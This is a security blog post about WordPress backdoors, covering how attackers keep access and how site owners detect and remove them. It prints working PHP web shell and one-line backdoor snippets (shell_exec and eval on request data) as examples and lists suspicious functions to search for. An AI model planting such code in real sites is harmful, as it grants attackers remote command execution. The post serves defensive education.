BlogSecurity Tips
Security Tips

WordPress Malware and Backdoors: How Attackers Maintain Persistent Access

Once a WordPress site is compromised, attackers install backdoors to maintain access even after vulnerabilities are patched. Learn how to detect and remove them.

WPSentry TeamMarch 8, 20263 min read
Table of Contents 6 sections

What Are WordPress Backdoors?

A backdoor is a piece of malicious code hidden within your WordPress installation that allows an attacker to bypass normal authentication and regain access to your site at any time. Even after you patch the original vulnerability and change all passwords, a backdoor provides persistent access.

Backdoors are typically installed after an initial compromise through another vulnerability (XSS, SQLi, brute force, etc.).

Common Types of WordPress Backdoors

1. PHP Web Shells

Full-featured interfaces that allow file management, database access, and command execution:

<?php
// Often obfuscated or encoded
if(isset($_REQUEST['cmd'])){
  echo shell_exec($_REQUEST['cmd']);
}
?>

2. One-Line Backdoors

Minimal code that's easy to hide within legitimate files:

<?php eval(base64_decode($_POST['data'])); ?>
<?php @assert($_GET['cmd']); ?>
<?php preg_replace('/.*/e', $_POST['code'], ''); ?>

3. Database-Stored Backdoors

Malicious code stored in wp_options or widget settings, executed when the page loads. These survive file-level malware scans.

4. Modified Core Files

Attackers inject code into WordPress core files like wp-includes/version.php or wp-admin/includes/class-wp-upgrader.php. Core file integrity checks can detect these.

Where Attackers Hide Backdoors

  • /wp-content/uploads/ — PHP files disguised as images or hidden in year/month folders
  • /wp-includes/ — Modified core files or new files with legitimate-sounding names
  • /wp-content/themes/ — Inactive themes that nobody checks
  • /wp-content/plugins/ — Fake plugins or modified legitimate plugin files
  • .htaccess — Redirect rules or PHP execution directives
  • wp-config.php — Additional code appended to the configuration file
  • Cron jobs — Using wp_schedule_event() to periodically reinstall backdoors

How to Detect Backdoors

  1. Core file integrity checking — Compare your WordPress files against the official checksums using wp core verify-checksums
  2. Look for suspicious functions — Search for eval(), base64_decode(), assert(), preg_replace with /e, system(), exec(), passthru()
  3. Check file modification dates — Files modified after your last legitimate update are suspicious
  4. Scan uploads directory — PHP files should never be in /wp-content/uploads/
  5. Review cron events — Use WP-CLI to list all scheduled events and look for unfamiliar ones
  6. Monitor outbound connections — Backdoors often "phone home" to command and control servers

Removal and Recovery

  1. Take a full backup first (for forensic analysis)
  2. Reinstall WordPress core from a clean source
  3. Remove all plugins and reinstall from wordpress.org
  4. Switch to a fresh copy of your theme
  5. Reset all passwords (WordPress, database, FTP, hosting panel)
  6. Regenerate WordPress salts and keys in wp-config.php
  7. Review and clean the database (check wp_options for injected content)
  8. Set up monitoring to detect reinfection

Prevention

  • Keep everything updated — core, themes, and plugins
  • Use strong, unique passwords with 2FA enabled
  • Restrict file permissions (wp-config.php: 400, directories: 755, files: 644)
  • Disable file editing from the WordPress admin: define('DISALLOW_FILE_EDIT', true);
  • Run regular security scans to detect changes

FAQ

Frequently Asked Questions

A backdoor is malicious code hidden within your WordPress installation that allows an attacker to bypass normal authentication and regain access at any time. Even after you patch the original vulnerability and change passwords, a backdoor provides persistent access.

Common hiding locations include /wp-content/uploads/ (PHP files disguised as images), /wp-includes/ (modified core files), inactive themes and plugins, .htaccess files, wp-config.php, and WordPress cron jobs that periodically reinstall backdoors.

Use core file integrity checking (wp core verify-checksums), search for suspicious PHP functions like eval(), base64_decode(), and system(), check file modification dates, scan the uploads directory for PHP files, review scheduled cron events, and monitor outbound connections.

Take a full backup for forensic analysis, reinstall WordPress core from a clean source, remove and reinstall all plugins from wordpress.org, switch to a fresh theme copy, reset all passwords, regenerate WordPress salts and keys, clean the database, and set up monitoring for reinfection.

Keep everything updated, use strong unique passwords with 2FA, restrict file permissions (wp-config.php: 400, directories: 755, files: 644), disable file editing with DISALLOW_FILE_EDIT, and run regular security scans to detect changes early.

Tags

malwarebackdoorswordpresssecuritycleanup

Related Posts

Security Tips

Phishing Attacks Targeting WordPress Sites: Fake Logins, Deceptive Emails, and Credential Theft

WordPress sites are frequently used to host phishing pages or are targeted by phishing campaigns to steal admin credentials. Learn how to protect yourself.

WPSentry Team·Mar 8, 2026
Security Tips

DDoS Attacks on WordPress: How to Keep Your Site Online Under Attack

Distributed Denial of Service attacks can take your WordPress site offline by overwhelming it with traffic. Learn how they work and how to protect against them.

WPSentry Team·Mar 8, 2026
Security Tips

File Inclusion Vulnerabilities in WordPress: LFI and RFI Explained

File inclusion vulnerabilities allow attackers to read sensitive files or execute malicious code on your WordPress server. Learn how LFI and RFI attacks work.

WPSentry Team·Mar 8, 2026
Back to Blog